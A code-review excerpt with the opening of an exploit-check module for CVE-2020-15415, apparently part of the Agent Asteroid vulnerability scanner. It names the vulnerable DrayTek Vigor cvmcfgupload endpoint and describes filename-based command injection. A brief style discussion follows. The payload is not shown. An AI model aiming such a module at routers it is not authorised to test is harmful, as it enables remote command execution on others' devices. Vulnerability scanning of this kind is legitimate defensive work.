agent/exploits/cve_2020_15415.py

```diff
@@ -0,0 +1,74 @@
+"""Agent Asteroid implementation for CVE-2020-15415"""
+
+import logging
+import re
+from urllib import parse as urlparse
+
+import requests
+
+from agent import definitions
+from agent import exploits_registry
+from agent.exploits import webexploit
+
+VULNERABILITY_TITLE = "Remote Command Execution in DrayTek Vigor Routers"
+VULNERABILITY_REFERENCE = "CVE-2020-15415"
+VULNERABILITY_DESCRIPTION = """A command injection vulnerability exists in the cgi-bin/mainfunction.cgi/cvmcfgupload endpoint of DrayTek Vigor3900, Vigor2960, and Vigor300B devices before version 1.5.1, allowing remote code execution via shell metacharacters in a filename."""
+RISK_RATING = "CRITICAL"
+
+MAX_REDIRECTS = 2
+DEFAULT_TIMEOUT = 90
+
+UNIQUE_VALUE = "34ec96cf-d6f1-428a-b955-95080d0536e5"
+
+
+@exploits_registry.register
+class DrayTekVigorCommandInjectionExploit(webexploit.WebExploit):
+    accept_request = definitions.Request(method="GET", path="/")
+    check_request = definitions.Request(
+        method="POST", path="/cgi-bin/mainfunction.cgi/cvmcfgupload?1=2"
+    )
+    accept_pattern = [re.compile(r"Vigor Login Page")]
```

Comment:
Could be a const.. also the path from previous line..

Reply:
For all the other PRs we use the path directly there